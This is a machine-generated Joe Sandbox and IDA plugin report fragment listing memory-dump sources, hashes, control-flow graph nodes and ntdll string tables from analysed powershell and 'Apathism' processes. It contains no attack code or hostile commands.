                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: efa1cbdc671ba6e044d8b8d4fed00feef694fa08e2227f0c50f57d4db2c0f00c
                          • Instruction ID: 0a015a0347b3ee5718017dadb5c1a03aa185aa0dad0c754440f572ef53033519
                          • Opcode Fuzzy Hash: efa1cbdc671ba6e044d8b8d4fed00feef694fa08e2227f0c50f57d4db2c0f00c
                          • Instruction Fuzzy Hash: 971159B13083C9BFEB7007E64840F767BF58F82611F348976E695D7282D6B98844C761
                          Memory Dump Source
                          • Source File: 00000002.00000002.2149587513.00000000070A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 070A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_2_2_70a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 67137e1c29fb06c53326b3ce7a2f49e4cfee2e0f55142b4a04fa7d338182c58a
                          • Instruction ID: dae7c58f8d44d1e46150a64ee0200e01bc094152d4bad970810a2758bf97b6e5
                          • Opcode Fuzzy Hash: 67137e1c29fb06c53326b3ce7a2f49e4cfee2e0f55142b4a04fa7d338182c58a
                          • Instruction Fuzzy Hash: 99A011302800008BC208CA00CC82800B322AB82308B28C0C8AA088F282CF23E803AA00

                          Execution Graph

                          Execution Coverage:0%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:40%
                          Total number of Nodes:5
                          Total number of Limit Nodes:1
                          execution_graph 78027 22372c70 LdrInitializeThunk 78030 22372c00 78032 22372c0a 78030->78032 78033 22372c1f LdrInitializeThunk 78032->78033 78034 22372c11 78032->78034

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 4 22372c70-22372c7c LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: bc81d3fd454bfc4be9763318f7e414e4840ec337a9ddbfdb35d163bcffaff958
                          • Instruction ID: 3c7b3ab7dc58cffdd643ec26964c00242aeb77dbb1edfc09105c3d3f46a92bbe
                          • Opcode Fuzzy Hash: bc81d3fd454bfc4be9763318f7e414e4840ec337a9ddbfdb35d163bcffaff958
                          • Instruction Fuzzy Hash: 0890023520158C02D110715C848474A000647D0301F99C411A4424A1CD86A98D917122

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 5 22372df0-22372dfc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 01fed8d289be5d5a8a94b01f640adb3563161fccc62ba17abbf78e9ac23ab285
                          • Instruction ID: d59e3d30bc022b69d6de1fe9b218e7ab8de3ca2b5de8a4051b6f85f3d8e8ace0
                          • Opcode Fuzzy Hash: 01fed8d289be5d5a8a94b01f640adb3563161fccc62ba17abbf78e9ac23ab285
                          • Instruction Fuzzy Hash: 1A90023520150813D111715C4584707000A47D0341FD5C412A042491CD966A8E52A122

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 6 223735c0-223735cc LdrInitializeThunk
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 5d5bf9b6e22e6d35b152d40b26c3e62bf0e763bf3a3327b7714c037b22dafcbb
                          • Instruction ID: 69c0f119326100207ebfa197fcfc1dbf92a583b0d5c6a6b6240af1ef0810e9e2
                          • Opcode Fuzzy Hash: 5d5bf9b6e22e6d35b152d40b26c3e62bf0e763bf3a3327b7714c037b22dafcbb
                          • Instruction Fuzzy Hash: 0590023560560802D100715C4594706100647D0301FA5C411A042492CD87A98E5165A3

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 0 22372c0a-22372c0f 1 22372c11-22372c18 0->1 2 22372c1f-22372c26 LdrInitializeThunk 0->2
                          APIs
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: InitializeThunk
                          • String ID:
                          • API String ID: 2994545307-0
                          • Opcode ID: 6066d9d2141af4e121e95d996a3c2aa9923f12f3b9402e142907a2e57c044879
                          • Instruction ID: bcd16fc9f61b6c5b526549f74ed0711a58409bf013ded3a161981f3b460bf2a6
                          • Opcode Fuzzy Hash: 6066d9d2141af4e121e95d996a3c2aa9923f12f3b9402e142907a2e57c044879
                          • Instruction Fuzzy Hash: 79B09B719016C5C5DB01E7644B48707791577D0701F55C061D3030645F477CC5D1E176
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-2160512332
                          • Opcode ID: 6b927a0bdf5be26a0ce878cc04f32e628046b0a62b7bc2fa2e296f91f949b1b1
                          • Instruction ID: 79661cf16253b442bf4ee61eae2c69235532bc652658ad58e8b5c504d960cfb0
                          • Opcode Fuzzy Hash: 6b927a0bdf5be26a0ce878cc04f32e628046b0a62b7bc2fa2e296f91f949b1b1
                          • Instruction Fuzzy Hash: 8C927A71A08741ABE724CF24C980F5BB7E8BF88754F004A2DFA94DB651DBB4D944CB92

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1078 22368620-22368681 1079 22368687-22368698 1078->1079 1080 223a5297-223a529d 1078->1080 1080->1079 1081 223a52a3-223a52b0 GetPEB 1080->1081 1081->1079 1082 223a52b6-223a52b9 1081->1082 1083 223a52bb-223a52c5 1082->1083 1084 223a52d6-223a52fc call 22372ce0 1082->1084 1083->1079 1085 223a52cb-223a52d4 1083->1085 1084->1079 1089 223a5302-223a5306 1084->1089 1087 223a532d-223a5341 call 223354a0 1085->1087 1094 223a5347-223a5353 1087->1094 1089->1079 1091 223a530c-223a5321 call 22372ce0 1089->1091 1091->1079 1098 223a5327 1091->1098 1096 223a5359-223a536d 1094->1096 1097 223a555c-223a5568 call 223a556d 1094->1097 1100 223a538b-223a5401 1096->1100 1101 223a536f 1096->1101 1097->1079 1098->1087 1105 223a543a-223a543d 1100->1105 1106 223a5403-223a5435 call 2232fd50 1100->1106 1104 223a5371-223a5378 1101->1104 1104->1100 1107 223a537a-223a537c 1104->1107 1109 223a5443-223a5494 1105->1109 1110 223a5514-223a5517 1105->1110 1118 223a554d-223a5552 call 223ba4b0 1106->1118 1111 223a537e-223a5381 1107->1111 1112 223a5383-223a5385 1107->1112 1119 223a54ce-223a5512 call 2232fd50 * 2 1109->1119 1120 223a5496-223a54cc call 2232fd50 1109->1120 1113 223a5519-223a5548 call 2232fd50 1110->1113 1114 223a5555-223a5557 1110->1114 1111->1104 1112->1100 1112->1114 1113->1118 1114->1094 1118->1114 1119->1118 1120->1118
                          Strings
                          • Thread is in a state in which it cannot own a critical section, xrefs: 223A5543
                          • 8, xrefs: 223A52E3
                          • corrupted critical section, xrefs: 223A54C2
                          • double initialized or corrupted critical section, xrefs: 223A5508
                          • Critical section address, xrefs: 223A5425, 223A54BC, 223A5534
                          • Critical section address., xrefs: 223A5502
                          • Critical section debug info address, xrefs: 223A541F, 223A552E
                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 223A540A, 223A5496, 223A5519
                          • Address of the debug info found in the active list., xrefs: 223A54AE, 223A54FA
                          • undeleted critical section in freed memory, xrefs: 223A542B
                          • Thread identifier, xrefs: 223A553A
                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 223A54E2
                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 223A54CE
                          • Invalid debug info address of this critical section, xrefs: 223A54B6
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                          • API String ID: 0-2368682639
                          • Opcode ID: 418d8996a2c43694b06978bc41e4d9525625418281b75bd0f7833bd7eb67ea45
                          • Instruction ID: da72ef5da008279636bcb7c513662323793ba8a55c15c7128414642c041ae155
                          • Opcode Fuzzy Hash: 418d8996a2c43694b06978bc41e4d9525625418281b75bd0f7833bd7eb67ea45
                          • Instruction Fuzzy Hash: 9C819CB1E00348EFEB14CF95C980FAEBBB9FB48714F508629E504B7281D735A944CB64

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 223e0274-223e0296 call 22387e54 1304 223e0298-223e02b0 RtlDebugPrintTimes 1301->1304 1305 223e02b5-223e02cd call 223276b2 1301->1305 1309 223e0751-223e0760 1304->1309 1310 223e06f7 1305->1310 1311 223e02d3-223e02e9 1305->1311 1312 223e06fa-223e074e call 223e0766 1310->1312 1313 223e02eb-223e02ee 1311->1313 1314 223e02f0-223e02f2 1311->1314 1312->1309 1316 223e02f3-223e030a 1313->1316 1314->1316 1318 223e0310-223e0313 1316->1318 1319 223e06b1-223e06ba GetPEB 1316->1319 1318->1319 1320 223e0319-223e0322 1318->1320 1322 223e06bc-223e06d7 GetPEB call 2232b970 1319->1322 1323 223e06d9-223e06de call 2232b970 1319->1323 1324 223e033e-223e0351 call 223e0cb5 1320->1324 1325 223e0324-223e033b call 2233ffb0 1320->1325 1331 223e06e3-223e06f4 call 2232b970 1322->1331 1323->1331 1336 223e035c-223e0370 call 2232758f 1324->1336 1337 223e0353-223e035a 1324->1337 1325->1324 1331->1310 1340 223e0376-223e0382 GetPEB 1336->1340 1341 223e05a2-223e05a7 1336->1341 1337->1336 1342 223e0384-223e0387 1340->1342 1343 223e03f0-223e03fb 1340->1343 1341->1312 1344 223e05ad-223e05b9 GetPEB 1341->1344 1347 223e0389-223e03a4 GetPEB call 2232b970 1342->1347 1348 223e03a6-223e03ab call 2232b970 1342->1348 1345 223e04e8-223e04fa call 223427f0 1343->1345 1346 223e0401-223e0408 1343->1346 1349 223e05bb-223e05be 1344->1349 1350 223e0627-223e0632 1344->1350 1369 223e0590-223e059d call 223e11a4 call 223e0cb5 1345->1369 1370 223e0500-223e0507 1345->1370 1346->1345 1355 223e040e-223e0417 1346->1355 1359 223e03b0-223e03d1 call 2232b970 GetPEB 1347->1359 1348->1359 1351 223e05dd-223e05e2 call 2232b970 1349->1351 1352 223e05c0-223e05db GetPEB call 2232b970 1349->1352 1350->1312 1356 223e0638-223e0643 1350->1356 1368 223e05e7-223e05fb call 2232b970 1351->1368 1352->1368 1362 223e0438-223e043c 1355->1362 1363 223e0419-223e0429 1355->1363 1356->1312 1364 223e0649-223e0654 1356->1364 1359->1345 1389 223e03d7-223e03eb 1359->1389 1373 223e044e-223e0454 1362->1373 1374 223e043e-223e044c call 22363bc9 1362->1374 1363->1362 1371 223e042b-223e0435 call 223edac6 1363->1371 1364->1312 1372 223e065a-223e0663 GetPEB 1364->1372 1400 223e05fe-223e0608 GetPEB 1368->1400 1369->1341 1378 223e0509-223e0510 1370->1378 1379 223e0512-223e051a 1370->1379 1371->1362 1382 223e0665-223e0680 GetPEB call 2232b970 1372->1382 1383 223e0682-223e0687 call 2232b970 1372->1383 1375 223e0457-223e0460 1373->1375 1374->1375 1387 223e0472-223e0475 1375->1387 1388 223e0462-223e0470 1375->1388 1378->1379 1391 223e051c-223e052c 1379->1391 1392 223e0538-223e053c 1379->1392 1397 223e068c-223e06ac call 223d86ba call 2232b970 1382->1397 1383->1397 1398 223e0477-223e047e 1387->1398 1399 223e04e5 1387->1399 1388->1387 1389->1345 1391->1392 1401 223e052e-223e0533 call 223edac6 1391->1401 1403 223e053e-223e0551 call 22363bc9 1392->1403 1404 223e056c-223e0572 1392->1404 1397->1400 1398->1399 1406 223e0480-223e048b 1398->1406 1399->1345 1400->1312 1408 223e060e-223e0622 1400->1408 1401->1392 1415 223e0563 1403->1415 1416 223e0553-223e0561 call 2235fe99 1403->1416 1407 223e0575-223e057c 1404->1407 1406->1399 1413 223e048d-223e0496 GetPEB 1406->1413 1407->1369 1414 223e057e-223e058e 1407->1414 1408->1312 1418 223e0498-223e04b3 GetPEB call 2232b970 1413->1418 1419 223e04b5-223e04ba call 2232b970 1413->1419 1414->1369 1421 223e0566-223e056a 1415->1421 1416->1421 1427 223e04bf-223e04dd call 223d86ba call 2232b970 1418->1427 1419->1427 1421->1407 1427->1399
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID: DebugPrintTimes
                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                          • API String ID: 3446177414-1700792311
                          • Opcode ID: 512c9b6376b0c5388d33f57f0088aa31269bb34940a6e23c1b41aebd6505fc5f
                          • Instruction ID: 79dfa325cc1c7ebaa539aa0b4c5755d04cb625f6357c24d4d9cc388671c6e51e
                          • Opcode Fuzzy Hash: 512c9b6376b0c5388d33f57f0088aa31269bb34940a6e23c1b41aebd6505fc5f
                          • Instruction Fuzzy Hash: 11D1CB71604BA5DFCB16CFA8C540BADBBF2FF59314F048259E84AAB252C734A949CF14
                          Strings
                          • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 223A2506
                          • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 223A2409
                          • @, xrefs: 223A259B
                          • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 223A2602
                          • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 223A24C0
                          • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 223A25EB
                          • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 223A2624
                          • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 223A22E4
                          • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 223A2498
                          • RtlpResolveAssemblyStorageMapEntry, xrefs: 223A261F
                          • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 223A2412
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                          • API String ID: 0-4009184096
                          • Opcode ID: 8b7bb3ffbbb5ccaba48a64ef23545aa57e4be620a0da49c664fa13aa97e182ac
                          • Instruction ID: 9a668889707bf94adaf5db687b71c83d9031eba9469f5d955905f70849393847
                          • Opcode Fuzzy Hash: 8b7bb3ffbbb5ccaba48a64ef23545aa57e4be620a0da49c664fa13aa97e182ac
                          • Instruction Fuzzy Hash: ED023EB1D003289BDB21CB14CD90BE9B7B8BF55304F1141EAEA49A7242DBB09F84CF59
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                          • API String ID: 0-2515994595
                          • Opcode ID: e6df8f3ce7ad75ffe1665a1b7f83efcbbbe78fee30e5251b5907e1b3ed6473bb
                          • Instruction ID: cd622ea19fb587bf5b55cec7ef0fbc83cdd58db43d3bea8c658bd074c747f48f
                          • Opcode Fuzzy Hash: e6df8f3ce7ad75ffe1665a1b7f83efcbbbe78fee30e5251b5907e1b3ed6473bb
                          • Instruction Fuzzy Hash: 7E51C2735053419BC325CF148980BABB7ECEF94B54F504A1EF955C3285E770E60ACBA2
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T$`V0"${
                          • API String ID: 0-3979271505
                          • Opcode ID: a56c5475574dba29d2040dc9db9c689aac61e3b25449c24014b04771d52d9a15
                          • Instruction ID: 62c1f7d26c73f35765d208e387beab920ce9b6438c183d530ec1084b5184f5e8
                          • Opcode Fuzzy Hash: a56c5475574dba29d2040dc9db9c689aac61e3b25449c24014b04771d52d9a15
                          • Instruction Fuzzy Hash: 97A26774A0572A8FDB65CF28CD98B99B7B5BF46318F1042E9DA0DA7251DB309E81CF40
                          Strings
                          • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 223B8A3D
                          • VerifierFlags, xrefs: 223B8C50
                          • VerifierDlls, xrefs: 223B8CBD
                          • AVRF: -*- final list of providers -*- , xrefs: 223B8B8F
                          • HandleTraces, xrefs: 223B8C8F
                          • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 223B8A67
                          • VerifierDebug, xrefs: 223B8CA5
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
                          • API String ID: 0-3223716464
                          • Opcode ID: 083ca2a997e88890f37ce88345b3844af6d9bd8dada706af4dfc6fab4b011d79
                          • Instruction ID: 7b4520d8685f383c118d37c30a758090f37ca3dfb9c4f94c73d1e5ff36b53af1
                          • Opcode Fuzzy Hash: 083ca2a997e88890f37ce88345b3844af6d9bd8dada706af4dfc6fab4b011d79
                          • Instruction Fuzzy Hash: 1D9147B1A42741AFD325CF6988E0F1A77E8EF54714F814A5AFA40AFA55CB30DD00CBA5
                          Strings
                          • LdrpDynamicShimModule, xrefs: 2239A998
                          • minkernel\ntdll\ldrinit.c, xrefs: 2239A9A2
                          • TG0", xrefs: 22352462
                          • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 2239A992
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$TG0"$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-1116696979
                          • Opcode ID: 2b2b434f9c80fe4d4b993add69cd8d6ae9d4afcc6d0b4cba83d3797d385def81
                          • Instruction ID: 319e5b33245405f066c8006f80a29dccec5ae2374232e0cb2d29af0a367afbe8
                          • Opcode Fuzzy Hash: 2b2b434f9c80fe4d4b993add69cd8d6ae9d4afcc6d0b4cba83d3797d385def81
                          • Instruction Fuzzy Hash: 91314B71A40301AFD7249F9AC980F5A7BF5FF85704F224759ED01AB259CBB85E81CB90
                          Strings
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
                          • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                          • API String ID: 0-792281065
                          • Opcode ID: 124cbff15d07cafa4c9236b90706951faf515312dc95c2a4cc9437887aeea193
                          • Instruction ID: dd83256852b1356cf8496cbe046b2b4b861f97f67c5fd10be37dc34bf64aa20a
                          • Opcode Fuzzy Hash: 124cbff15d07cafa4c9236b90706951faf515312dc95c2a4cc9437887aeea193
                          • Instruction Fuzzy Hash: B1915B30B007549BD729CF51C9A4BBA7BB8FF40768F014639EE016B68EDB789801CB95
                          Strings
                          • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 223A219F
                          • SXS: %s() passed the empty activation context, xrefs: 223A2165
                          • RtlGetAssemblyStorageRoot, xrefs: 223A2160, 223A219A, 223A21BA
                          • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 223A2180
                          • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 223A21BF
                          • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 223A2178
                          Memory Dump Source
                          • Source File: 00000007.00000002.2616142115.0000000022300000.00000040.00001000.00020000.00000000.sdmp, Offset: 22300000, based on PE: true
                          • Associated: 00000007.00000002.2616142115.0000000022429000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002242D000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000007.00000002.2616142115.000000002249E000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_22300000_Apathism.jbxd
                          Similarity
                          • API ID:
